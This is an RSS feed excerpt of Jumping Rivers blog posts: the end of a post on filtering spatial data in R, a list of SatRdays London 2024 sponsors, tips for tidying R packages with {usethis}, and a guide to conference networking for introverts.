&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;wales_lsoa &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;st_read&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;data/Lower_layer_Super_Output_Areas_2021_EW_BGC_V3.gpkg&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; wkt_filter &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; wales_wkt)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p align="center"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/wales.png" style="width:100%" alt="Left:An outline of Wales.
Right: A map of all the LSOAs that overlap with the polygon of Wales. There are some English LSOAs visible on the border. Cymru am byth."/&gt;
&lt;/p&gt;
&lt;p&gt;We can see that only the LSOAs that overlap with the polygon of Wales
have been read in. Note that spatial intersection can be a little bit
&lt;a href="https://r.geocompx.org/spatial-operations#topological-relations" rel="external"&gt;&lt;em&gt;complicated&lt;/em&gt;&lt;/a&gt;.
We’ve actually read in some English LSOAs along the Wales/England border
in addition to the Welsh LSOAs because these technically overlap with
the Wales polygon on the border itself. So it’s not perfect, but as a
tool for selecting the rows of interest, before reading into R’s
memory - it’s still pretty handy.&lt;/p&gt;
&lt;p&gt;For another great example of using Spatial SQL to read in data
efficiently, check out this nice &lt;a href="https://jayrobwilliams.com/posts/2020/09/spatial-sql" rel="external"&gt;blog
post&lt;/a&gt; by Rob
Williams.&lt;/p&gt;
&lt;p&gt;Hopefully these quick tips will help you the next time you’re working
with spatial data. If you want to learn more, check out our course on
&lt;a href="https://www.jumpingrivers.com/training/course/r-spatial-analysis-sf-tmap-leaflet/" rel="external"&gt;Spatial Data Analysis with R&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/large-spatial-data-r-sql/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>SatRdays London 2024: Sponsors</title><link>https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/</link><pubDate>Tue, 19 Mar 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
main h3 a:after { content: unset; }
main h3 a { text-decoration: unset; }
&lt;/style&gt;
&lt;p&gt;&lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;SatRdays London&lt;/a&gt; wouldn&amp;rsquo;t be possible without our sponsors, so we wanted to take the time to tell you a little bit about them.&lt;/p&gt;
&lt;p&gt;Don&amp;rsquo;t miss out on this great chance to learn from R experts and network with fellow data science enthusiasts! Tickets are on &lt;a href="https://satrdays-london-2024.jumpingrivers.com/" rel="external"&gt;sale now&lt;/a&gt;!&lt;/p&gt;
&lt;h3 id="cusp-london"&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;CUSP London&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;CUSP London is the Centre for Urban Science and Progress based at King&amp;rsquo;s College London, UK. Their mission is to support interdisciplinary research and innovation using Data Science in and for London.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://cusplondon.ac.uk/" rel="external"&gt;&lt;img src="cusp-logo@2x.png" alt="CUSP London Logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/CuspLondon" rel="external"&gt;@CuspLondon&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="r-consortium"&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;R Consortium&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The central mission of the R Consortium is to work with and provide support to the R Foundation and to the key organizations developing, maintaining, distributing and using R software through the identification, development and implementation of infrastructure projects.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://www.r-consortium.org/" rel="external"&gt;&lt;img src="r-consortium-logo.png" alt="R Consortium Logo" style="width: 600px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/RConsortium" rel="external"&gt;@RConsortium&lt;/a&gt;&lt;/p&gt;
&lt;h3 id="jumping-rivers"&gt;&lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Jumping Rivers is an analytics company specialising in creating bespoke solutions for modern business problems. Their team of data science and engineering experts come from many different backgrounds, and their wealth of knowledge and experience allows them to think outside the box and solve problems in new and innovative ways.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://twitter.com/RConsortium" rel="external"&gt;&lt;img src="JR_logo_dark.png" alt="Jumping Rivers Logo" style="width: 400px; display: block; margin-left: auto; margin-right: auto;"/&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Find them on X(/Twitter) &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;@jumping_uk&lt;/a&gt; and Mastodon &lt;a href="https://fosstodon.org/@jumpingrivers" rel="external"&gt;@jumpingrivers@fosstodon.org&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/satrdays-london-2024-sponsors/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Spring clean your R packages</title><link>https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/</link><pubDate>Thu, 07 Mar 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Did you know we maintain a number of public R packages on our &lt;a href="https://github.com/jumpingrivers" rel="external"&gt;GitHub page&lt;/a&gt;. Some of these packages were developed way back in 2019. Since then, the standards in R package development have changed a little and we thought it was time to have a little spring clean of our packages.&lt;/p&gt;
&lt;p&gt;In this blog post, we&amp;rsquo;ll be using functions from the &lt;a href="https://usethis.r-lib.org/" rel="external"&gt;{usethis} package&lt;/a&gt; to spruce up some of our old packages. We&amp;rsquo;ve chosen five quick improvements which you should be able to implement in 15 minutes or less. Grab your duster and come along.&lt;/p&gt;
&lt;h3 id="rename-master-to-main"&gt;Rename master to main&lt;/h3&gt;
&lt;p&gt;We wrote a whole &lt;a href="https://www.jumpingrivers.com/blog/git-moving-master-to-main/" rel="external"&gt;blog post&lt;/a&gt; on why it&amp;rsquo;s a good idea to move the default branch name from &lt;code&gt;master&lt;/code&gt; to the more neutral name, &lt;code&gt;main&lt;/code&gt;. Luckily, renaming a single repository is straightforward and this one command will basically do everything for you.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;git_default_branch_rename&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="tidy-your-description-file"&gt;Tidy your description file&lt;/h3&gt;
&lt;p&gt;Your &lt;code&gt;DESCRIPTION&lt;/code&gt; file is argubly the most important file in your R package as it defines the purpose of your code and contains important metadata. Take a minute to check that the key fields are still correct, in particular the contact email address, description and any URLs.&lt;/p&gt;
&lt;p&gt;You can then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_tidy_description&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will put the fields in a standard order and alphabetise the dependencies. It&amp;rsquo;s looking tidier already. 😌&lt;/p&gt;
&lt;h3 id="migrate-to-github-actions"&gt;Migrate to GitHub Actions&lt;/h3&gt;
&lt;p&gt;TravisCI used to be the most popular tool for continuous integration in the #RStats community. In recent years, many R package developers have moved away from &lt;a href="https://ropensci.org/blog/2020/11/19/moving-away-travis/" rel="external"&gt;Travis CI&lt;/a&gt; to &lt;a href="https://docs.github.com/en/actions" rel="external"&gt;GitHub Actions&lt;/a&gt;. Dean Attali wrote a &lt;a href="https://deanattali.com/blog/migrating-travis-to-github/" rel="external"&gt;detailed guide&lt;/a&gt; explaining the migration process in full. However, for most simple packages, all we need to do is delete the existing &lt;code&gt;travis.yml&lt;/code&gt; file, and then run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_github_action&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;check-standard&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;to set up the standard GitHub action. This action will run &lt;code&gt;R CMD check&lt;/code&gt; using R-latest on Linux, Mac, and Windows. This is a good baseline if you plan on submitting your package to CRAN. It will also add a lovely badge to your &lt;code&gt;README.md&lt;/code&gt; that will show users that your package is passing the check.&lt;/p&gt;
&lt;p&gt;If your R package has tests, you might also want to run&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_github_action&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;code-coverage&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which will calculate your test coverage and report to &lt;a href="https://about.codecov.io" rel="external"&gt;codecov.io&lt;/a&gt;.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-spring-clean-rpkg"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="create-a-hex-sticker"&gt;Create a hex sticker&lt;/h3&gt;
&lt;p&gt;We all know that the most important part of any R package is the hex sticker. If you don&amp;rsquo;t already have one, you easily can create one in R with &lt;a href="https://github.com/GuangchuangYu/hexSticker" rel="external"&gt;{hexSticker}&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;You can choose any image or plot to position on your sticker. You can then customise it by changing the colours, fonts and adding a url.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;sticker&lt;/span&gt;(subplot &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hoover.png&amp;#34;&lt;/span&gt;, s_x&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;1&lt;/span&gt;, s_y&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;.75&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; h_fill &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#4898a8&amp;#34;&lt;/span&gt;, h_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#516e7a&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;springClean&amp;#34;&lt;/span&gt;, p_size&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;20&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; url &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;, u_color &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;#FFFFFF&amp;#34;&lt;/span&gt;, u_size &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;6&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; filename &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;sticker.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img src="sticker.png" alt="A hexsticker with for a fictional package springClean. There is a robot with a vacuum in the middle." style="display: block; margin-left: auto; margin-right: auto; width: 200px"/&gt;
&lt;p&gt;You can add the hex sticker as a logo to your package with another helpful {usethis} function.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_logo&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;sticker.png&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="contributing-and-code-of-conduct"&gt;Contributing and Code of Conduct&lt;/h3&gt;
&lt;p&gt;One of the great things about R package developement is that it&amp;rsquo;s a team effort. If you want people to contribute to the development of your R packages, you need to tell them &lt;em&gt;how&lt;/em&gt; to contribute. It&amp;rsquo;s also a good idea to add a code of conduct, to set an example of how we should work together.&lt;/p&gt;
&lt;p&gt;At Jumping Rivers, we follow the standard contributing and CoC guides that the tidyverse developers use. Again, {usethis} provides functions that make adding these files to your package really easy.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_tidy_contributing&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;usethis&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;use_coc&lt;/span&gt;(contact &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;hello@jumpingrivers.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="get-involved"&gt;Get involved&lt;/h3&gt;
&lt;p&gt;That&amp;rsquo;s it for our quick spring clean. We always welcome new contributors to our R packages. If you have any issues or want to make a PR head over to our &lt;a href="https://github.com/jumpingrivers" rel="external"&gt;GitHub page&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;And if we&amp;rsquo;ve inspired you to dust off your old R packages and give them some love, let us know on &lt;a href="https://twitter.com/jumping_uk" rel="external"&gt;Twitter/X&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/spring-clean-r-package-usethis/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>An introvert's guide to networking at a conference</title><link>https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/</link><pubDate>Thu, 29 Feb 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/an-introverts-guide-to-networking-at-a-conference/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
.blog-content h2 {font-size: 1.5em;}
&lt;/style&gt;
&lt;h2 id="uh-oh-conferences-ive-been-trying-not-to-think-about-them-but-i-cant-put-it-off-any-longer"&gt;Uh oh. Conferences. I&amp;rsquo;ve been trying not to think about them, but I can&amp;rsquo;t put it off any longer.&lt;/h2&gt;
&lt;p&gt;That&amp;rsquo;s okay! It might not be too late to book on to the conferences you want to attend. Some will even still have early bird offers available if you&amp;rsquo;re quick.&lt;/p&gt;
&lt;h2 id="oh-thats-not-a-problem-im-already-booked-on-travel-is-arranged-my-talk-is-written-its-just-"&gt;Oh that&amp;rsquo;s not a problem. I&amp;rsquo;m already booked on, travel is arranged, my talk is written. It&amp;rsquo;s just &amp;hellip;&lt;/h2&gt;
&lt;p&gt;&amp;hellip; just what?&lt;/p&gt;
&lt;h2 id="-theres-so-many-people-and-events-my-manager-said-theyre-great-networking-opportunities-so-i-think-shes-expecting-me-to-come-back-with-a-whole-list-of-new-contacts-too"&gt;&amp;hellip; there&amp;rsquo;s so many people and events. My manager said &amp;ldquo;they&amp;rsquo;re great networking opportunities&amp;rdquo; so I think she&amp;rsquo;s expecting me to come back with a whole list of new contacts too.&lt;/h2&gt;
&lt;p&gt;Oh! Well I &lt;em&gt;love&lt;/em&gt; attending conferences. Spending time with interesting people, and meeting new folk leaves me all energised and buzzy. But conferences aren&amp;rsquo;t just for extroverts like me.&lt;/p&gt;
&lt;p&gt;Setting your manager&amp;rsquo;s possible expectations aside for a second, just focus on what you can benefit from when networking: Meeting the people behind interesting projects that could be helpful to you; encountering contacts with interesting job opportunities; finding like-minded people to attend the social events with.&lt;/p&gt;
&lt;p&gt;Maybe I can help you out with a few tips?&lt;/p&gt;
&lt;h2 id="that-would-be-great-how-should-i-prepare"&gt;That would be great! How should I prepare?&lt;/h2&gt;
&lt;p&gt;Before you get there, you can use social media. Conferences often have #hashtags associated with them. If you use social media, posting about the event can be a great, low-stress way to engage with other attendees.&lt;/p&gt;
&lt;p&gt;I often post something like&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&amp;ldquo;Excited to be on my way to Seattle for #positconf2024 ✈️ Anyone else there this year?&amp;rdquo;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;when I&amp;rsquo;m travelling.&lt;/p&gt;
&lt;p&gt;That way, if someone I already know is attending, we can make plans to meet up and hang out together.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Join us for our AI in Production conference! For more details, check out our
&lt;a href="https://ai-in-production.jumpingrivers.com/"&gt;conference website!&lt;/a&gt;
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="thats-a-nice-idea-but-what-happens-if-i-dont-already-know-people-who-are-going"&gt;That&amp;rsquo;s a nice idea. But what happens if I don&amp;rsquo;t already know people who are going?&lt;/h2&gt;
&lt;p&gt;Check the event schedule for the conference.
There is often a welcome event aimed at people who are new to the conference.&lt;/p&gt;
&lt;p&gt;The day before the &lt;a href="https://rss.org.uk/training-events/conference-2024/" rel="external"&gt;RSS International Conference&lt;/a&gt;, the Young Statisticians arrange a workshop to help early career statisticians get to know the organisers and make some conference friends before the main event starts.&lt;/p&gt;
&lt;h2 id="sounds-useful-but-im-going-to-encounter-people-at-some-point-and-i-never-know-what-to-say"&gt;Sounds useful. But I&amp;rsquo;m going to encounter people at some point and I never know what to say.&lt;/h2&gt;
&lt;p&gt;First of all, people &lt;em&gt;love&lt;/em&gt; talking about themselves, and they like you for taking an interest and listening to them. Think up and remember a few standard questions that can get the ball rolling and see where the conversation goes from there.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Where do you work?&lt;/li&gt;
&lt;li&gt;What parts of the work do you enjoy?&lt;/li&gt;
&lt;li&gt;Did you travel far to get here?&lt;/li&gt;
&lt;li&gt;Did you go to University? Where did you study?&lt;/li&gt;
&lt;li&gt;What&amp;rsquo;s the funniest issue you&amp;rsquo;ve encountered in your work?&lt;/li&gt;
&lt;/ul&gt;
&lt;h2 id="oh-so-i-just-to-need-to-remember-some-questions-to-ask"&gt;Oh so I just to need to remember some questions to ask?&lt;/h2&gt;
&lt;p&gt;Yes, and come up with some nice icebreakers if you can.&lt;/p&gt;
&lt;h2 id="or-nicebreakers-see-what-i-did-there"&gt;Or &lt;em&gt;nicebreakers&lt;/em&gt;. See what I did there?&lt;/h2&gt;
&lt;p&gt;You must be very pleased with yourself.&lt;/p&gt;
&lt;h2 id="i-am-actually"&gt;I am actually.&lt;/h2&gt;
&lt;p&gt;Well don&amp;rsquo;t forget the time will come where you have to introduce yourself in return. A little preparation goes a long way here.&lt;/p&gt;
&lt;p&gt;Prepare a short sentence explaining who you are, what you do and what you&amp;rsquo;re interested in.
At networking events, you&amp;rsquo;ll constantly be asked these questions.
Preparing a two-minute introduction and practising it slowly out loud can help you feel more confident in the moment.&lt;/p&gt;
&lt;p&gt;And it might sound silly, but make a conscious effort to say your name and company slowly when you first introduce yourself.
I find myself saying &amp;ldquo;Hi, I&amp;rsquo;m Rhian and I work for Jumping Rivers&amp;rdquo; so many times, that I naturally rush over the words, creating an awkward situation where the other person didn&amp;rsquo;t catch your name.&lt;/p&gt;
&lt;h2 id="so-i-should-rehearse-by-talking-to-myself-the-mirror-like-they-do-on-the-sims"&gt;So I should rehearse by talking to myself the mirror like they do on &lt;em&gt;The Sims&lt;/em&gt;?&lt;/h2&gt;
&lt;p&gt;If that helps you, sure. It doesn&amp;rsquo;t have to be perfectly scripted, but making a coherent introduction of yourself creates a good first impression.&lt;/p&gt;
&lt;h2 id="when-im-there-wont-everyone-already-know-each-other-already"&gt;When I&amp;rsquo;m there, won&amp;rsquo;t everyone already know each other already?&lt;/h2&gt;
&lt;p&gt;Remember, plenty of people go to conferences alone and don&amp;rsquo;t know anyone else attending. If there&amp;rsquo;s a pub quiz, or other team-based social activity, it&amp;rsquo;s okay to turn up by yourself. It&amp;rsquo;s the organisers&amp;rsquo; job to make you feel welcome and help you find others to chat with.&lt;/p&gt;
&lt;p&gt;There&amp;rsquo;s also going to be events such as poster sessions and welcome drinks, where it&amp;rsquo;s entirely normal for anyone to be interacting with new people. The individuals you do meet may go on to introduce you to other people they know at the conference.&lt;/p&gt;
&lt;h2 id="oh-yeah-this-schedule-has-a-few-of-those-sessions-with-free-snacks-and-drinks"&gt;Oh yeah, this schedule has a few of those sessions with free snacks and drinks.&lt;/h2&gt;
&lt;p&gt;Take it easy on the free wine and coffee. It&amp;rsquo;s easy to use alcohol and copious amounts of coffee to boost your networking bravery at the poster session. However, too much caffeine or alcohol can cause social anxiety and leave you feeling queasy the next morning.&lt;/p&gt;
&lt;h2 id="are-you-speaking-from-personal-experience-here"&gt;Are you speaking from personal experience here?&lt;/h2&gt;
&lt;p&gt;Maybe 😳&lt;/p&gt;
&lt;h2 id="what-if-i-dont-drink-alcohol"&gt;What if I don&amp;rsquo;t drink alcohol?&lt;/h2&gt;
&lt;p&gt;There&amp;rsquo;s also no obligation to drink alcohol. Younger generations are increasingly becoming non-drinkers, and most events will have a decent selection of non-alcoholic drinks. Some conferences organise alcohol-free socials too, like an evening walking-tour or a morning run group.&lt;/p&gt;
&lt;h2 id="these-networking-events-sound-busy"&gt;These networking events sound busy.&lt;/h2&gt;
&lt;p&gt;Yes, some of these events can be crowded and noisy. For some people, that can be a bit overwhelming. It&amp;rsquo;s perfectly okay to step outside for fresh air or to sit in a quieter corner to regain some energy. In fact, it can be a good idea because it&amp;rsquo;s unlikely that you&amp;rsquo;ll be the only person to do this&amp;mdash;other likeminded introverts will also have the same idea, giving you an opportunity to meet someone new in a quieter location.&lt;/p&gt;
&lt;h2 id="if-theres-alcohol-at-a-session-like-a-pub-quiz-or-a-poster-session-should-i-be-talking-about-business-or-avoiding-work-related-topics"&gt;If there&amp;rsquo;s alcohol at a session, like a pub quiz or a poster session, should I be talking about business or avoiding work-related topics?&lt;/h2&gt;
&lt;p&gt;This is a tricky one. Some people will be aiming to create business connections and opportunities, and some will be in a more relaxed and sociable mode. This is a situation where you have to read the intentions of the other person and adapt.&lt;/p&gt;
&lt;p&gt;It&amp;rsquo;s totally okay to talk about non-work topics at any point during the conference. Chatting about hobbies and finding common interests is a great way to connect with people. If someone wants to talk to you about a business opportunity, they will likely steer the conversation back to work, and move on if they don&amp;rsquo;t think you can help them. Don&amp;rsquo;t take this personally! People have different reasons for attending conferences.&lt;/p&gt;
&lt;p&gt;It can also depend on the conference. Some massive machine learning and AI expos can be very business focused, whilst smaller academic or programming conferences can have more of a community feel. If you aren&amp;rsquo;t sure about the vibe, you can always ask someone who has attended that conference before.&lt;/p&gt;
&lt;h2 id="how-do-i-maintain-contact-with-the-people-i-meet"&gt;How do I maintain contact with the people I meet?&lt;/h2&gt;
&lt;p&gt;Traditionally, you would exchange business cards. In Japan there&amp;rsquo;s even an etiquette for receiving a business card where you take a moment to admire and study the person&amp;rsquo;s details on the card you&amp;rsquo;ve just received&amp;mdash;they&amp;rsquo;d never take a business card and rush it straight into their wallet alongside countless other business cards to be forgotten.&lt;/p&gt;
&lt;p&gt;But in this modern world, business cards are becoming less common.
So if you don&amp;rsquo;t have cards to hand out, try connecting with them over LinkedIn&amp;mdash;the LinkedIn app allows you to share a &lt;a href="https://www.linkedin.com/help/linkedin/answer/a525286/using-a-linkedin-qr-code-to-connect-with-members" rel="external"&gt;QR code&lt;/a&gt; to link straight to your profile.
Or if either of you don&amp;rsquo;t use LinkedIn, you can exchange email addresses.
If the other person agrees, consider taking a selfie with them and emailing it to their address straight away&amp;mdash;not only have you exchanged details, but provided a visual memento and opened a conversation channel for further discussions after the conference.&lt;/p&gt;
&lt;h2 id="im-not-used-to-a-conference-this-big-theres-multiple-talks-going-on-at-the-same-time-whats-the-etiquette-if-i-want-to-be-in-different-sessions-for-different-talks"&gt;I&amp;rsquo;m not used to a conference this big. There&amp;rsquo;s multiple talks going on at the same time. What&amp;rsquo;s the etiquette if I want to be in different sessions for different talks?&lt;/h2&gt;
&lt;p&gt;Look at the conference programme in advance to plan which talks you want to attend. Big conferences often have &amp;ldquo;streams&amp;rdquo; meaning multiple talks will be happening concurrently.&lt;/p&gt;
&lt;p&gt;The start and end times of the talks are often scheduled to match across sessions, so you can switch between streams during the sessions between each talk.
It&amp;rsquo;s quite common to see a few people leave at the end of a talk to jump to the other stream.
If you want to change session, go at the same time as this crowd&amp;mdash;just move briskly and quietly so you cause minimal disruption, and sit strategically close to the exit for a quick escape.&lt;/p&gt;
&lt;p&gt;But sometimes it can be a bit awkward to sneak out of the back mid-session, especially if the room is small or talks are overrunning, so sometimes it&amp;rsquo;s easier just to commit yourself to a single stream per session.&lt;/p&gt;
